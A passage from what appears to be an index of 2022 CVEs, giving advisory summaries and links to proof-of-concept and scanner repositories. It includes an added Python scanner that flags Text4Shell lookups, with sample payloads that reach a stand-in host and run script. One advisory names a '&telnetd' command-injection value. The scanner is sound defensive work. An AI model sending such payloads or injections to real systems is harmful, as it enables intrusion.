Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.

- [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues)

### CVE-2022-41923 (2022-11-23)

Grails Spring Security Core plugin is vulnerable to privilege escalation. The vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint (i.e. the donor endpoint). In some Grails framework applications, access to the targeted endpoint will be granted based on meeting the authorization requirements of the donor endpoint, which can result in a privilege escalation attack. This vulnerability has been patched in grails-spring-security-core versions 3.3.2, 4.0.5 and 5.1.1. Impacted applications: Grails Spring Security Core plugin versions 1.x, 2.x, >=3.0.0 <3.3.2, >=4.0.0 <4.0.5 and >=5.0.0 <5.1.1. We strongly suggest that all Grails framework applications using the Grails Spring Security Core plugin be updated to a patched release of the plugin. Workarounds: Users should create a subclass extending one of the following classes from the `grails.plugin.springsecurity.web.access.intercept` package, depending on their security configuration:

- `AnnotationFilterInvocationDefinition`
- `InterceptUrlMapFilterInvocationDefinition`
- `RequestmapFilterInvocationDefinition`

In each case, the subclass should override the `calculateUri` method like so:

```groovy
@Override
protected String calculateUri(HttpServletRequest request) {
    // UrlPathHelper is org.springframework.web.util.UrlPathHelper
    UrlPathHelper.defaultInstance.getRequestUri(request)
}
```

This should be considered a temporary measure, as the patched versions of grails-spring-security-core deprecate the `calculateUri` method. Once upgraded to a patched version of the plugin, this workaround is no longer needed. The workaround is especially important for version 2.x, as no patch is available for version 2.x of the GSSC plugin.

- [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923)

### CVE-2022-41966 (2022-12-27)

XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service, purely via manipulation of the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers to these only as default map or set, is to change the default implementation of java.util.Map and java.util.Set per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.

- [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966)

### CVE-2022-42045 (2023-07-13)

Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28.

- [ReCryptLLC/CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)

### CVE-2022-42046 (2022-12-20)

A specially crafted IOCTL sent to wfshbr64.sys or wfshbr32.sys allows an arbitrary local user to perform local privilege escalation.

- [kkent030315/CVE-2022-42046](https://github.com/kkent030315/CVE-2022-42046)

### CVE-2022-42094 (2022-11-22)

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.

- [bypazs/CVE-2022-42094](https://github.com/bypazs/CVE-2022-42094)

### CVE-2022-42095 (2022-11-23)

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.

- [bypazs/CVE-2022-42095](https://github.com/bypazs/CVE-2022-42095)

### CVE-2022-42096 (2022-11-21)

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.

- [bypazs/CVE-2022-42096](https://github.com/bypazs/CVE-2022-42096)

### CVE-2022-42097 (2022-11-22)

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Comment' content.

- [bypazs/CVE-2022-42097](https://github.com/bypazs/CVE-2022-42097)

### CVE-2022-42098 (2022-11-22)

KLiK SocialMediaWebsite version v1.0.1 is vulnerable to SQL Injection via profile.php.

- [bypazs/CVE-2022-42098](https://github.com/bypazs/CVE-2022-42098)

### CVE-2022-42176 (2022-10-20)

In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access.

- [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176)

### CVE-2022-42475 (2023-01-02)

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

- [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475)
- [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475)
- [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475)
- [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet)
- [3yujw7njai/CVE-2022-42475-RCE-POC](https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC)
- [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475)
- [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475)

### CVE-2022-42703 (2022-10-09)

mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.

- [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo)
- [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703)

### CVE-2022-42864 (2022-12-15)

A race condition was addressed with improved state handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.

- [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864)

### CVE-2022-42889 (2022-10-13)

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:

- "script" - execute expressions using the JVM script execution engine (javax.script)
- "dns" - resolve dns records
- "url" - load values from urls, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.

- [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC)
- [chainguard-dev/text4shell-policy](https://github.com/chainguard-dev/text4shell-policy)
- [tulhan/commons-text-goat](https://github.com/tulhan/commons-text-goat)
- [karthikuj/cve-2022-42889-text4shell-docker](https://github.com/karthikuj/cve-2022-42889-text4shell-docker)
- [ClickCyber/cve-2022-42889](https://github.com/ClickCyber/cve-2022-42889)
- [korteke/CVE-2022-42889-POC](https://github.com/korteke/CVE-2022-42889-POC)
- [rockmelodies/CVE-2022-42889](https://github.com/rockmelodies/CVE-2022-42889)
- [eunomie/cve-2022-42889-check](https://github.com/eunomie/cve-2022-42889-check)
- [kljunowsky/CVE-2022-42889-text4shell](https://github.com/kljunowsky/CVE-2022-42889-text4shell)
- [securekomodo/text4shell-scan](https://github.com/securekomodo/text4shell-scan)
- [neerazz/CVE-2022-42889](https://github.com/neerazz/CVE-2022-42889)
- [uk0/cve-2022-42889-intercept](https://github.com/uk0/cve-2022-42889-intercept)
- [securekomodo/text4shell-poc](https://github.com/securekomodo/text4shell-poc)
- [humbss/CVE-2022-42889](https://github.com/humbss/CVE-2022-42889)
- [stavrosgns/Text4ShellPayloads](https://github.com/stavrosgns/Text4ShellPayloads)
- [s3l33/CVE-2022-42889](https://github.com/s3l33/CVE-2022-42889)
- [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker)
- [rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC](https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC)
- [akshayithape-devops/CVE-2022-42889-POC](https://github.com/akshayithape-devops/CVE-2022-42889-POC)
- [0xmaximus/Apache-Commons-Text-CVE-2022-42889](https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889)
- [smileostrich/Text4Shell-Scanner](https://github.com/smileostrich/Text4Shell-Scanner)
- [cxzero/CVE-2022-42889-text4shell](https://github.com/cxzero/CVE-2022-42889-text4shell)
- [west-wind/CVE-2022-42889](https://github.com/west-wind/CVE-2022-42889)
- [Vulnmachines/text4shell-CVE-2022-42889](https://github.com/Vulnmachines/text4shell-CVE-2022-42889)
- [Gotcha-1G/CVE-2022-42889](https://github.com/Gotcha-1G/CVE-2022-42889)
- [cryxnet/CVE-2022-42889-RCE](https://github.com/cryxnet/CVE-2022-42889-RCE)
- [sunnyvale-it/CVE-2022-42889-PoC](https://github.com/sunnyvale-it/CVE-2022-42889-PoC)
- [QAInsights/cve-2022-42889-jmeter](https://github.com/QAInsights/cve-2022-42889-jmeter)
- [adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889](https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889)
- [pwnb0y/Text4shell-exploit](https://github.com/pwnb0y/Text4shell-exploit)
- [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit)
- [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner)
- [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889)
- [hotblac/text4shell](https://github.com/hotblac/text4shell)
- [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889)
- [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker)
- [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker)
- [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell)
- [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker)
- [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC)
- [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889)
- [34006133/CVE-2022-42889](https://github.com/34006133/CVE-2022-42889)
- [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell)
- [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell)
- [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell)
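The description above gives the `${prefix:name}` grammar and names the three dangerous default lookups. The following is an added example, not code from any of the repositories listed above: a small log scanner that undoes percent-encoding (payloads are commonly sent as `%24%7B...%7D`, an assumption about attacker behaviour rather than something the advisory states), walks every `${...}` expression including nested ones, and reports any whose prefix is `script`, `dns` or `url`. The access-log lines at the bottom are constructed for this example.

```python
"""Detect Apache Commons Text ("Text4Shell") interpolation payloads in request logs.

Added example, not code from any repository listed on this page. The
log lines at the bottom are constructed, not real traffic.
"""
from urllib.parse import unquote

# The three default lookups the advisory names as dangerous in 1.5 - 1.9.
DANGEROUS_PREFIXES = frozenset({"script", "dns", "url"})


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_interpolations(text: str) -> list:
    """Return the body of every ${...} expression in text, nested ones included.

    "${script:javascript:${env:X}}" yields "env:X" (inner, closed first)
    and then "script:javascript:${env:X}" (outer).
    """
    found, stack, j = [], [], 0
    while j < len(text):
        if text.startswith("${", j):
            stack.append(j)
            j += 2
            continue
        if text[j] == "}" and stack:
            found.append(text[stack.pop() + 2:j])
        j += 1
    return found


def prefix_of(expression: str) -> str:
    """The lookup prefix is everything before the first ':' (case-insensitive)."""
    return expression.split(":", 1)[0].strip().lower()


def scan_line(line: str) -> list:
    """Return the dangerous lookup prefixes used in one log line, in order of appearance."""
    return [
        p for p in map(prefix_of, find_interpolations(decode_layers(line)))
        if p in DANGEROUS_PREFIXES
    ]


def scan_log(lines) -> dict:
    """Map line index -> dangerous prefixes, for every line that has any."""
    report = {}
    for idx, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            report[idx] = hits
    return report


# Constructed access-log lines (not real traffic); line 4 is double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /search?q=hello HTTP/1.1" 200 "-"',
    '10.0.0.7 - - "GET /search?q=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 500 "-"',
    '10.0.0.9 - - "GET /health HTTP/1.1" 200 "${dns:address|canary.example}"',
    '10.0.0.11 - - "GET /?x=${date:yyyy} HTTP/1.1" 200 "-"',
    '10.0.0.13 - - "GET /?x=%2524%257Burl%253Ahttp%253A%252F%252Fcanary.example%257D HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: dangerous lookups {hits}")
```

The `date` lookup on line 3 is left alone on purpose: only the three lookups the advisory removed from the defaults are reported, so a benign use of interpolation does not page anyone. Run it over a real access log by feeding the file's lines to `scan_log`.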

### CVE-2022-42896 (2022-11-23)

There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker within Bluetooth range of the victim could execute code or leak kernel memory. We recommend upgrading past commit https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4

- [Satheesh575555/linux-4.19.72_CVE-2022-42896](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-42896)
- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_old](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_old)
- [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896)
- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new)
- [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896)

### CVE-2022-42899 (2022-10-13)

Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.

- [iamsanjay/CVE-2022-42899](https://github.com/iamsanjay/CVE-2022-42899)

### CVE-2022-43096 (2022-11-17)

Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port.

- [ProxyStaffy/Mediatrix-CVE-2022-43096](https://github.com/ProxyStaffy/Mediatrix-CVE-2022-43096)

### CVE-2022-43097 (2022-12-05)

Phpgurukul User Registration & User Management System v3.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form & login pages.

- [nibin-m/CVE-2022-43097](https://github.com/nibin-m/CVE-2022-43097)

### CVE-2022-43117 (2022-11-21)

Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.

- [RashidKhanPathan/CVE-2022-43117](https://github.com/RashidKhanPathan/CVE-2022-43117)

### CVE-2022-43143 (2022-11-21)

A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.

- [goseungduk/beekeeper](https://github.com/goseungduk/beekeeper)

### CVE-2022-43144 (2022-11-08)

A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

- [mudassiruddin/CVE-2022-43144-Stored-XSS](https://github.com/mudassiruddin/CVE-2022-43144-Stored-XSS)

### CVE-2022-43271 (2022-12-22)

Inhabit Systems Pty Ltd Move CRM version 4, build 260 was discovered to contain a cross-site scripting (XSS) vulnerability via the User profile component.

- [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271)

### CVE-2022-43293 (2023-04-11)

Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe.

- [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293)

### CVE-2022-43332 (2022-11-17)

A cross-site scripting (XSS) vulnerability in Wondercms v3.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Site title field of the Configuration Panel.

- [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332)

### CVE-2022-43343 (2022-11-08)

N-Prolog v1.91 was discovered to contain a global buffer overflow vulnerability in the function gettoken() at Main.c.

- [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343)

### CVE-2022-43369 (2022-12-06)

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

- [sudoninja-noob/CVE-2022-43369](https://github.com/sudoninja-noob/CVE-2022-43369)

### CVE-2022-43571 (2022-11-03)

In Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, an authenticated user can execute arbitrary code through the dashboard PDF generation component.

- [ohnonoyesyes/CVE-2022-43571](https://github.com/ohnonoyesyes/CVE-2022-43571)

### CVE-2022-43680 (2022-10-24)

In libexpat through 2.4.9, there is a use-after-free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.

- [Trinadh465/external_expat-2.1.0_CVE-2022-43680](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-43680)
- [nidhihcl/external_expat_2.1.0_CVE-2022-43680](https://github.com/nidhihcl/external_expat_2.1.0_CVE-2022-43680)

### CVE-2022-43684 (2023-06-13)

ServiceNow has released patches and an upgrade that address an Access Control List (ACL) bypass issue in ServiceNow Core functionality. This issue is present in the following supported ServiceNow releases:

- Quebec prior to Patch 10 Hot Fix 8b
- Rome prior to Patch 10 Hot Fix 1
- San Diego prior to Patch 7
- Tokyo prior to Tokyo Patch 1
- Utah prior to Utah General Availability

If this ACL bypass issue were to be successfully exploited, it potentially could allow an authenticated user to obtain sensitive information from tables missing authorization controls.

- [lolminerxmrig/CVE-2022-43684](https://github.com/lolminerxmrig/CVE-2022-43684)

### CVE-2022-43704 (2023-01-20)

The Sinilink XY-WFT1 WiFi Remote Thermostat, running firmware 1.3.6, allows an attacker to bypass the intended requirement to communicate using MQTT. It is possible to replay Sinilink aka SINILINK521 protocol (udp/1024) commands interfacing directly with the target device. This, in turn, allows for an attack to control the onboard relay without requiring authentication via the mobile application. This might result in an unacceptable temperature within the target device's physical environment.

- [9lyph/CVE-2022-43704](https://github.com/9lyph/CVE-2022-43704)

### CVE-2022-43959 (2023-01-20)

Insufficiently Protected Credentials in the AD/LDAP server settings in 1C-Bitrix Bitrix24 through 22.200.200 allow remote administrators to discover an AD/LDAP administrative password by reading the source code of /bitrix/admin/ldap_server_edit.php.

- [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959)

### CVE-2022-43980 (2023-01-27)

There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, deliberately using an XSS payload as its name. Once created, if a user with admin privileges clicks on the edited network map, the XSS payload will be executed. The exploitation of this vulnerability could allow an attacker to steal the value of the admin user's cookie.

- [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980)

### CVE-2022-44118 (2022-11-23)

dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php.

- [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit)

### CVE-2022-44136 (2022-11-30)

Zenario CMS 9.3.57186 is vulnerable to Remote Code Execution (RCE).

- [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit)

### CVE-2022-44149 (2023-01-06)

The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 and 80.103.2.5045 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required.

- [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149)
- [geniuszlyy/CVE-2022-44149](https://github.com/geniuszlyy/CVE-2022-44149)

### CVE-2022-44183 (2022-11-21)

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

- [flagqaz/CVE-2022-44183](https://github.com/flagqaz/CVE-2022-44183)

### CVE-2022-44215 (2023-08-22)

There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL.

- [JBalanza/CVE-2022-44215](https://github.com/JBalanza/CVE-2022-44215)

### CVE-2022-44268 (2023-02-06)

ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary file (if the magick binary has permissions to read it).

- [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC)
- [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment)
- [agathanon/cve-2022-44268](https://github.com/agathanon/cve-2022-44268)
- [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector)
- [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc)
- [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC)
- [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268)
- [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc)
- [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268)
- [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268)
- [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction)
- [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268)
- [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak)
- [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit)
- [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268)
- [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268)
- [narekkay/auto-cve-2022-44268.sh](https://github.com/narekkay/auto-cve-2022-44268.sh)
- [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc)
- [chairat095/CVE-2022-44268_By_Kyokito](https://github.com/chairat095/CVE-2022-44268_By_Kyokito)
- [atici/Exploit-for-ImageMagick-CVE-2022-44268](https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268)
- [Vagebondcur/IMAGE-MAGICK-CVE-2022-44268](https://github.com/Vagebondcur/IMAGE-MAGICK-CVE-2022-44268)
- [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268)
- [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC)
- [PanAdamski/CVE-2022-44268-automated](https://github.com/PanAdamski/CVE-2022-44268-automated)
- [FlojBoj/CVE-2022-44268](https://github.com/FlojBoj/CVE-2022-44268)

### CVE-2022-44276 (2023-06-28)

In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE.

- [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC)

### CVE-2022-44311 (2022-11-08)

html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.

- [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311)
- [DesmondSanctity/CVE-2022-44311](https://github.com/DesmondSanctity/CVE-2022-44311)

### CVE-2022-44312 (2022-11-08)

PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the ExpressionCoerceInteger function in expression.c when called from ExpressionInfixOperator.

- [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2)

### CVE-2022-44318 (2022-11-08)

PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the StringStrcat function in cstdlib/string.c when called from ExpressionParseFunctionCall.

- [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318)

### CVE-2022-44569 (2023-11-03)

A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.

- [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit)

### CVE-2022-44666 (2022-12-13)

Windows Contacts Remote Code Execution Vulnerability

- [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666)

### CVE-2022-44721
- [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller)

### CVE-2022-44789 (2022-11-23)

A logical issue in O_getOwnPropertyDescriptor() in Artifex MuJS 1.0.0 through 1.3.x before 1.3.2 allows an attacker to achieve Remote Code Execution through memory corruption, via the loading of a crafted JavaScript file.

- [alalng/CVE-2022-44789](https://github.com/alalng/CVE-2022-44789)

### CVE-2022-44830 (2022-11-21)

Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted Excel file.

- [RashidKhanPathan/CVE-2022-44830](https://github.com/RashidKhanPathan/CVE-2022-44830)

### CVE-2022-44870 (2023-01-06)

A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.

- [Cedric1314/CVE-2022-44870](https://github.com/Cedric1314/CVE-2022-44870)

### CVE-2022-44875 (2023-03-06)

KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code.

- [AesirSec/CVE-2022-44875-Test](https://github.com/AesirSec/CVE-2022-44875-Test)

### CVE-2022-44877 (2023-01-05)

login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.

- [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877)
- [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE)
- [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7)
- [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877)
- [hotpotcookie/CVE-2022-44877-white-box](https://github.com/hotpotcookie/CVE-2022-44877-white-box)
- [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB)
- [dkstar11q/CVE-2022-44877](https://github.com/dkstar11q/CVE-2022-44877)
- [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE)
- [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877)

### CVE-2022-44900 (2022-12-06)

A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file.

- [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab)

### CVE-2022-45003 (2023-03-22)

Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus.

- [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003)

### CVE-2022-45004 (2023-03-22)

Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page.

- [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004)

### CVE-2022-45025 (2022-12-07)

Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function.

- [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025)
- [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025)

### CVE-2022-45047 (2022-11-16)

